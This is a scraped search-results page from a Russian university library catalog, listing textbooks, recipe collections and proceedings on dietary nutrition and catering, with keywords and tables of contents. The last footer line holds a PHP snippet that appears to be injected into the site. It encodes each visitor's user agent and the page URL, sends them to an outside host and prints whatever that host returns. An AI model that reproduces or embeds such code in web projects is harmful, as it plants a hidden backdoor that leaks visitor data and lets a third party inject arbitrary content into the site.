Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

131 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПИТАНИЕ ДИЕТИЧЕСКОЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 25
1. 
Ковалев Н. И. Технология приготовления пищи [Текст] : учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; под ред. М. А. Николаевой, 2008. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
2. 
Сборник рецептур блюд и кулинарных изделий диетического питания для предприятий общественного питания [Текст] : сб. технических нормативов / М-во экономического развития и торговли Рос. Федерации, 2002. - 630 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
3. 
Голубев В. Н. Справочник работника общественного питания [Текст] : справочное издание / В. Н. Голубев, М. П. Могильный, Т. В. Шленская, 2003. - 589 с.
Держатели документа (Информация об экземплярах) 
4. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; под ред. М. А. Николаевой, 2005. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
5. 
Харченко Н. Э. Сборник рецептур блюд и кулинарных изделий [Текст] : учеб. пособие для образовательных учреждений нач. проф. образования / Н. Э. Харченко, 2010. - 495 с.
Держатели документа (Информация об экземплярах) 
6. 
Шильман Л. З. Технологические процессы предприятий питания [Текст] : учеб. пособие для студентов сред. проф. образования / Л. З. Шильман, 2011. - 187 с.
Держатели документа (Информация об экземплярах) 
7. 
Сборник рецептур на продукцию диетического питания для предприятий общественного питания [Текст] / ред.: М. П. Могильный, В. А. Тутельян, 2013. - 807 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
8. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 1 [Текст] / ред. А. И. Барановский, 2012. - 174 с.
Ключевые слова 
Оглавление 
  • Авраменко, К. О. Формат «Free Flow» как инновационное направление в предприятиях индустрии питания / К. О. Авраменко, Н. В. Бураковская. - с.6-7
    Кл. слова: FREE FLOW
  • Агеева, Е. А. Современное состояние и направления развития общественного питания в г. Магнитогорске / Е. А. Агеева, И. А. Долматова. - с.7-12
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ
  • Деменконя, Е. М. Школьное питание как фактор развития здорового поколения / Е. М. Деменконя, М.А. Гриценко. - с.13-16
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Дризнер, Р. А. Современное состояние отрасли общественною питания в г. Екатеринбурге, проблемы кадров, трудоустройства и пути решения / Р. А. Дризнер. - с.16-21
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - КАДРЫ
  • Есина, А. Н. Соответствие испытательной лаборатории "Сертификат" критериям аккредитации / А. Н. Есина. - с.21-25
  • Каня, И. П. Бинарные занятия как средство формирования экспериментальных навыков (из опыта преподавания на технологическом факультете ОмЭИ) / И. П. Каня, О. Ю. Мельникова, А. Н. Королев. - с.25-28
    Кл. слова: ЗАНЯТИЕ БИНАРНОЕ
  • Ковальчук, А. В. Анализ рынка оборудования предприятий питания в России / А. В. Ковальчук, М. А. Шадрин. - с.28-34
    Кл. слова: ОБОРУДОВАНИЕ ПРЕДПРИЯТИЯ ОБЩЕСТВЕННОГО ПИТАНИЯ, РЫНОК ОБОРУДОВАНИЯ ПРЕДПРИЯТИЙ ПИТАНИЯ
  • Конищева, Е. А. Контроль качества меда / Е. А. Конищева, Е. П. Галкова. - с.31-34
    Кл. слова: КОНТРОЛЬ КАЧЕСТВА МЕДА, МЕД
  • Котова, Т. И. Современные тенденции развития рынка предприятии общественного питания г. Магнитогорска / Т. И. Котова, И. А. Долматова, В. Ф. Рябова. - с.34-41
    Кл. слова: ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ
  • Кузьменко, С. П. Реализация системы управления качеством продукции в Сибирском регионе / С. П. Кузьменко, М. А. Тарасова, М. А. Шадрин. - с.41-43
    Кл. слова: УПРАВЛЕНИЕ КАЧЕСТВОМ ПРОДУКЦИИ, СИБИРЬ
  • Кусаинова, Д. А. Гастрономические особенности китайской кухни / Д. А. Кусаинова. - с.44-45
    Кл. слова: КУХНЯ КИТАЙСКАЯ
  • Мустакова, М. М. О необходимости внедрения современных систем менеджмента на предприятия пищевой перерабатывающей промышленности стран таможенного союза / М. М. Мустакова. - с.46-49
    Кл. слова: ПРЕДПРИЯТИЕ ПИЩЕВОЙ ПРОМЫШЛЕННОСТИ, СОЮЗ ТАМОЖЕННЫЙ, МЕНЕДЖМЕНТ
  • Пестова, П. А. Личность в социальной системе управления сферы услуг / П. А. Пестова. - с.49-54
    Кл. слова: СФЕРА УСЛУГ
  • Плаксина, Н. Н. Изучение аминокислотного состава блюд студенческих столовых / Н. Н. Плаксина, Н. И. Барышникова. - с.54-57
    Кл. слова: АМИНОКИСЛОТА, СТОЛОВАЯ СТУДЕНЧЕСКАЯ
  • Платова, А. В. Применение кейтеринга в Омском регионе на примере банкетного зала "Анна" / А. В. Платова, М. С. Мальцева, М. А. Шадрин. - с.57-59
    Кл. слова: КЕЙТЕРИНГ
  • Репин, М. Н. Характеристика рынка торгового оборудования Омского региона / М. Н. Репин, М. А. Шадрин. - с.59-62
    Кл. слова: ОБОРУДОВАНИЕ ТОРГОВОЕ, ОМСКАЯ ОБЛАСТЬ
  • Рождественская, Л. Н. Целеполагание в системе управления качеством услуг социального питания / Л. Н. Рождественская. - с.62-71
    Кл. слова: ПИТАНИЕ СОЦИАЛЬНОЕ, УПРАВЛЕНИЕ КАЧЕСТВОМ ПИТАНИЯ, КАЧЕСТВО ПИТАНИЯ
  • Седельникова, Д. С. Организация и технология диетического питания в гостиничных комплексах / Д. С. Седельникова. - с.72-74
    Кл. слова: ПИТАНИЕ ДИЕТИЧЕСКОЕ, ГОСТИНИЦА - ПИТАНИЕ
  • Турлубаева, А. Н. Обеспечение качества и безопасности пищевых продуктов / А. Н. Турлубаева, С. В. Стадникова. - с.74-78
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Хлононских, Н. А. Особенности обслуживания тематических мероприятий / Н. А. Хлононских. - с.78-81
    Кл. слова: ОБСЛУЖИВАНИЕ МЕРОПРИЯТИЙ
  • Янушкевич, К. А. Роль международных стандартов в обеспечении качества и безопасности пищевых продуктов / К. А. Янушкевич, Н. А. Смирнова. - с.81-84
    Кл. слова: БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Алексеева, Г. В. Способы повышения качества кондитерских изделий на жировой основе / Г. В. Алексеева, И. А. Ивкова. - с.86-90
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, ВАФЛИ
  • Аникина, Е. Н. Актуальность разработки молочно-злаковых продуктов / Е. Н. Аникина. - с.91-94
    Кл. слова: ПРОДУКТЫ МОЛОЧНО-ЗЛАКОВЫЕ
  • Аникина, Е. Н. Перспективы использования пребиотиков в производстве ферментированных молочных продуктов / Е. Н. Аникина, О. В. Пасько. - с.94-98
    Кл. слова: ПРЕБИОТИКИ
  • Аралбаева, Г. Д. Индустриальные технологии в производстве молочных продуктов на примере ООО «Молочный завод "Лузинский" / Г. Д. Аралбаева, А. Б. Лобкова. - с.98-101
    Кл. слова: МОЛОКО, ЗАВОД МОЛОЧНЫЙ ЛУЗИНСКИЙ
  • Банадысева, И. Д. Особенности формирования потребительского восприятия инноваций в общественном питании / И. Д. Банадысева, Л. Н. Рождественская. - с.98-101
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ - ИННОВАЦИИ, ВОСПРИЯТИЕ ПОТРЕБИТЕЛЬСКОЕ
  • Беспалова, Т. А. Гармонизации стандартов продуктов питания / Т. А. Беспалова, О. А. Приступа. - с.107-113
    Кл. слова: СТАНДАРТЫ ПРОДУКТОВ ПИТАНИЯ
  • Васильева, В. Э. Функциональный наполнитель в хлебопечении / В. Э. Васильева. - с.113-116
    Кл. слова: ХЛЕБ, НАПОЛНИТЕЛИ ХЛЕБА
  • Вилемсон, Е. М. Разработка мороженого с пробиотическими свойствами / Е. М. Вилемсон, О. В. Пасько. - с.116-120
    Кл. слова: МОРОЖЕНОЕ
  • Воронкова, М. Н. Зависимость показателей качества хлеба пшеничного от показателей качества зерна пшеницы / М. Н. Воронкова. - с.120-125
    Кл. слова: КАЧЕСТВО ХЛЕБА, КАЧЕСТВО ЗЕРНА, ХЛЕБ
  • Воронова, Е. А. Производство функциональных продуктов на предприятии ООО "Сибирский молочный комбинат" / Е. А. Воронова, Н. И. Захарчснко, А. Г. Анацкая. - с.125-131
    Кл. слова: БИФИДИН
  • Вотинцев, Ю. П. Производство творожных продуктов методом ультрафильтрации / Ю. П. Вотинцев. - с.132-134
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, МЕТОД УЛЬТРАФИЛЬТРАЦИИ
  • Выставной, И. А. Изучение процесса ферментации сливочной основы ассоциациями микроорганизмов / И. А. Выставной. - с.134-140
    Кл. слова: ФЕРМЕНТАЦИЯ, МИКРООРГАНИЗМ
  • Гаврилова, Ю. А. Использование зимологических индикаторов при контроле качества пищевой продукции микробиологическими методами / Ю. А. Гаврилова. - с.141-144
    Кл. слова: ИНДИКАТОР ЗИМОЛОГИЧЕСКИЙ
  • Гатауллина, Ю. Р. Батончики мюсли повышенной биологической ценности на соево-злаковой основе / Ю. Р. Гатауллина. - с.144-147
    Кл. слова: МЮСЛИ, БАТОНЧИКИ МЮСЛИ
  • Герунов, Т. В. Пестициды - потенциальная угроза качеству продуктов питания / Т. В. Герунов, А. П. Козлов, А. В. Леушин. - с.147-150
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ - ПЕСТИЦИДЫ
  • Гончарова, Т. С. Современные способы повышения качества пищевых продуктов / Т. С. Гончарова. - с.150-153
    Кл. слова: КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ
  • Дудко, В. В. Современные индустриальные технологии пищевых продуктов / В. В. Дудко, В. А. Кузнецова. - с.153-156
    Кл. слова: ТЕХНОЛОГИЯ ПИЩЕВЫХ ПРОИЗВОДСТВ, ПРОИЗВОДСТВО ПИЩЕВОЕ
  • К вопросу о создании обогащенных продуктов питания / ; Ю. В. Евпатченко, [и др.]. - с.156-160
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ ОБОГАЩЕННЫЕ
  • Оценка безопасности продуктов питания посредством показателя активности воды / ; Ю. В. Евпатченко, [и др.]. - с.160-164
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ
  • Есипова, М. С. Разработка новых рецептур пудинга творожного с плодово-ягодными наполнителями для питания школьников / М. С. Есипова. - с.164-168
    Кл. слова: ПУДИНГ ТВОРОЖНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Ефремова, О. М. Отруби как функциональная добавка в хлебобулочных изделиях / О. М. Ефремова. - с.169-171
    Кл. слова: ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ
Держатели документа (Информация об экземплярах) 
9. 
Доценко В. А. Практическое руководство по санитарному надзору за предприятиями пищевой и перерабатывающей промышленности, общественного питания и торговли [Текст] / В. А. Доценко, 2013. - 831 с.
Ключевые слова 
НАДЗОР САНИТАРНО-ЭПИДЕМИОЛОГ -- ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ ОБЩЕСТВЕННОЕ - Надзор -- Паспорт санитарный -- ЭКСПЕРТИЗА САНИТАРНО-ЭПИДЕМИ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕСКОЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- МАГАЗИН продовольственный -- РЫНОК ПРОДОВОЛЬСТВЕННЫЙ -- ПРЕДПРИЯТИЕ ПИЩЕВОЙ ПРОМЫШЛЕННОСТИ -- ПРЕДПРИЯТИЕ ПЕРЕРАБАТЫВАЮЩЕЕ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНАЯ -- Продукт органический -- СРОК ГОДНОСТИ ПИЩЕВЫХ ПРОДУКТОВ -- Условия хранения пищевых продуктов -- ОТРАВЛЕНИЕ ПИЩЕВОЕ
Оглавление 
  • СанПин 2.3.2.1078-01. Гигиенические требования безопасности и пищевой ценности пищевых продуктов. - с.681-755
  • Федеральный закон "О защите прав юридических лиц и индивидуальных предпринимателей при осуществлении государственного контроля (надзора) и муниципального надзора". - с.756-780
  • Правила предоставления уведомлений о начале осуществления отдельных видов предпринимательской деятельности и учета оказанных уведомлений. - с.782-784
  • Формы основных административных регламентов Роспотребнадзора по проведению проверок пищевых предприятий. - с.787-815
  • Порядок оказания медицинской помощи населению по профилю "Диетология". - с.816-823
  • Основы государственной политики Российской Федерации в области здорового питания населения на период до 2020 года. - с.824-827
  • Утвержденные методы определений контролируемых показателей. - с.828-831
Держатели документа (Информация об экземплярах) 
10. 
Могильный М. П. Организация и технология обслуживания питанием в гостиничных комплексах (рекомендации, перспективы, проектирование) [Текст] : производственно-практическое издание / М. П. Могильный, А. Ю. Баласанян, 2004. - 176 с.
Ключевые слова 
БАД -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- ХОЗЯЙСТВО ГОСТИНИЧНОЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- СЕРВИС -- VIP - обслуживание -- МЕНЮ -- ТУРИЗМ молодежный -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- ПИТАНИЕ ИНТУРИСТОВ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ БОЛГАРСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ИНДИЙСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- КУХНЯ МЕКСИКАНСКАЯ -- КУХНЯ МОНГОЛЬСКАЯ -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ПОЛЬСКАЯ -- КУХНЯ РУМЫНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ЧЕШСКАЯ -- КУХНЯ СЛОВАЦКАЯ -- КУХНЯ ЮГОСЛАВСКАЯ -- КУХНЯ ЯПОНСКАЯ -- Кухня арабская -- Кухня Юго-Восточной Азии -- Кухня кубинская -- Кухня стран Латинской Америки -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- КУХНЯ НАЦИОНАЛЬНАЯ -- День разгрузочный
Держатели документа (Информация об экземплярах) 
11. 
Барановский В. А. Повар [Текст] : учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Л. Г. Шатун, 2003. - 383 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- СУП -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ТЕСТО -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
12. 
Дубцов Г. Г. Технология приготовления пищи [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Г. Г. Дубцов, 2001. - 269 с.
Держатели документа (Информация об экземплярах) 
13. 
Большая энциклопедия дома и семьи. В 2 т. Т.1. Семья. Жилище. Ребенок. Питание. Здоровье, спорт, отдых. Одежда, обувь, индивидуальный стиль [Текст] : энциклопедия, 2000. - 479 с.
14. 
Завистовска, Зофья. Диетическое питание при различных заболеваниях [Текст] / З. Завистовска, 1992. - 221, [1] с.
Ключевые слова 
ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА ПИТАНИЯ -- ПИТАНИЕ ЗДОРОВОЕ -- БЕЛКИ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- САХАРИДЫ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- ВИТАМИНЫ- ПИТАНИЕ -- МЕНЮ ДИЕТИЧЕСКОЕ -- ДИЕТА ЛЕЧЕБНАЯ -- ДИЕТА ЛЕГКОУСВОЯЕМАЯ -- БОЛЕЗНЬ ЖЕЛУДКА - ПИТАНИЕ -- БОЛЕЗНЬ КИШЕЧНИКА - ПИТАНИЕ -- БОЛЕЗНЬ ПЕЧЕНИ - ПИТАНИЕ -- ДИАБЕТ САХАРНЫЙ - ПИТАНИЕ -- ОЖИРЕНИЕ - ПИТАНИЕ -- БОЛЕЗНЬ СЕРДЦА - ПИТАНИЕ -- БОЛЕЗНЬ ПОЧЕК - ПИТАНИЕ -- ТЕМПЕРАТУРА ВЫСОКАЯ - ПИТАНИЕ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ -- СУПЫ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ОВОЩИ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МУЧНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ КРУП - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ ЯИЦ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МЯСНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА РЫБНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- СОУС - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА СЛАДКИЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ ДИЕТИЧЕСКИЕ -- НАПИТКИ - ПИТАНИЕ ЛЕЧЕБНОЕ
15. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
16. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; Под ред. М. А. Николаевой, 2003. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
17. 
Дубцов Г. Г. Технология приготовления пищи [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Г. Г. Дубцов, 2002. - 269 с.
Держатели документа (Информация об экземплярах) 
18. 
Голубев В. Н. Пищевые и биологически активные добавки [Текст] : Учеб. для студ. вузов / В. Н. Голубев, Л. В. Чичева-Филатова,Т. В. Шленская, 2003. - 201 с.
Держатели документа (Информация об экземплярах) 
19. 
Шатун Л. Г. Технология приготовления пищи [Текст] : Учеб. / Л. Г. Шатун, 2004. - 479 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- КОНТРОЛЬ КАЧЕСТВА блюд -- Клеймо ветеринарное -- МЕНЮ -- ПИТАНИЕ учащихся -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ тепловая -- СУП -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ сои -- Соя -- ПРАВИЛА отпуска блюд -- ПРАВИЛА подачи напитков
Держатели документа (Информация об экземплярах) 
20. 
Простакова, Татьяна Михайловна. Технология приготовления пищи [Текст] / Т. М. Простакова, 1999. - 351 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2938 - 26.06.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.84 с.12 запросов, 0.56c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;